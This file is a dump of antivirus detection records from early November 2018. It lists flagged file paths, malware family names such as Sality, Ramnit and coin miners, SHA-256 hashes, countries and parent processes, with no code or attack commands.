  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='d9186a5819ffad47f82a6e1720812a0589ad39f9fda4f4c32e690f1205f8e2e3', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='085f747d9c5a2e04a7b8c1ff35b643602e6313c16bf4c2d157b3997086c06869', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165039-e95aa0d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-165039-E95AA0D6', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:50:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadagentlib.dll', filepath='C:\\Program Files\\Qualcomm\\QPST\\bin\\DownloadAgentLib.dll', filesize=2008000, name='W32/Ramnit.C.#M1.#R1'), hash='5b1ec1d96891ce2592e7104f3fb467884ca05ee68b7ff03f01c30129587291f0', metadata=Row(cmdline='--engine=2 --session-id=xuGpFouaftt8hIW618Q5g6WRMZivZdEOtkv1RjTB --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-01T11:53:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T15:53:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_cg.exe', filepath='C:\\NIFPGA\\programs\\Xilinx14_7\\ISE\\bin\\nt\\_cg.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='655e782110cfd248aca4d614bab9123d17d0beb896818c60f4da79f086d8d40e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Z9GLXPWNEkKiBRLf.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:52:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mitmdump.exe', filepath='C:\\Program Files (x86)\\mitmproxy\\bin\\mitmdump.exe', filesize=5000000, name='HEUR/AGEN.1031272.#M1.#R1'), hash='491d9362db041c189aaf974ea3e1f21b824f12538f90fa6cf927bf0edc26c9af', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\mitmproxy-4.0.4-windows-installer.exe', parentsize=40538732, timestamp='2018-11-01T18:32:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192337-c7665873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5e2599b\\AVSCAN-20181101-192054-AEDB714E\\AVSCAN-20181101-192337-C7665873', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:37:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:47:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='K:\\HBCD\\Programs\\FLASHMEMORYTOOLKIT.EXE', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dforrt.dll', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\dforrt.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='3733fc7edd059f37cf9b5173a6c6f1045fb96003a1fc43d6ec004a84970a17bf', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:22:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='javaws.exe', filepath='C:\\Users\\X\\alterland-launcher\\updates\\jre-8u131-win64\\bin\\javaws.exe', filesize=360000, name='W32/Neshta.A.#M1.#R1'), hash='5780857f84d31a0764c9a865bfe936cf45f146db5c69bd9ff5db3b842d5b93a9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4132.47923\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa4132.47923\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pin_code_warpinbox_1r195t.exe', filepath='C:\\Users\\X\\Downloads\\Pin_Code_warpinbox_1R195T.exe', filesize=1252000, name='HEUR/AGEN.1032885.#M1.#R1'), hash='030dd9ec156ebc0681daf34ee362d6d919eb997cdffde55902fdd235748d56fa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:38:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005240-0c286233', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-005240-0C286233', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090518-fe6bf33e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-223138-2600B995\\AVSCAN-20181102-090518-FE6BF33E', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fills.scr', filepath='F:\\New folder\\Corel Content\\Fills\\Fills.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003550-8f54a443', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003550-8F54A443', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:20:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0059195.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0059195.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cameriere ai piani.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\CAMERIERE AI PIANI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171111-c7194233', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_93301ced\\AVSCAN-20181101-171049-C2CF68E8\\AVSCAN-20181101-171111-C7194233', filesize=64000, name='DR/PcClient.Gen.#M300.#R5075'), hash='e9bcb3cc0465caa5ab2050374d7d9267b25f231a9e1a83ad83bc2104f3decc6b', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102656-f5963654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7b854cb\\AVSCAN-20181101-102444-85381EE4\\AVSCAN-20181101-102656-F5963654', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152116-80f1884a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152116-80F1884A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095150-53a640e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095150-53A640E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102550-196b3969', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a52eeccd\\AVSCAN-20181101-102534-102FEB55\\AVSCAN-20181101-102550-196B3969', filesize=448000, name='PUA/BitcoinMiner.#M1.#R1'), hash='e27e5ced296898518d1afea14f01e1c470cd013dd13534f48e1c1e5b0fdd7ef0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='testi grammatica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ITALIANO\\testi grammatica.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsdF2E2.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nueva carpeta                                   .scr', filepath='E:\\Nueva carpeta                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:35:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso apprendistato base.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CORSO APPRENDISTATO BASE\\CORSO APPRENDISTATO BASE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='dcc8f1e721265406eb841bbe07b0768bc6d78628e29f7743897e0ffc94be8b17', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T13:00:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\4z02oo3z3dg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:09:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094933-3938a5c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094933-3938A5C7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm819B.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T12:44:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\C2E2D2C07098F50685D559A6286FF40D2261D831260B6737D2BFE2DFFC72F3DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c2e2d2c07098f50685d559a6286ff40d2261d831260b6737d2bfe2dffc72f3dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:26:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3187.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3187.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093919-c3a79362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093919-C3A79362', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152404-a13bef33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152404-A13BEF33', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:24:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-121406-3d22a3cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-121406-3D22A3CF', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:56:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131356-2376ad6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131356-2376AD6F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:13:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Local\\AwesomeMiner\\zec.miner.0.3.4b_1\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Awesome Miner\\AwesomeMiner.exe', parentsize=4861768, timestamp='2018-11-04T10:00:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172209-c0e7b526', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172209-C0E7B526', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:22:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lmgrd.exe', filepath='e:\\autocadler\\autocad2007\\bin\\acadfeui\\support\\nlm\\program files\\autodesk network license manager\\lmgrd.exe', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='765d772c0a32d3a7eda5a61134ef63f5f13a9cf4de631a579d75011b159a8145', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:37:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:43:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T16:19:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001946-9ba2b85e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001946-9BA2B85E', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:49:32Z'), dt=datetime.date(2018, 11, 4)),
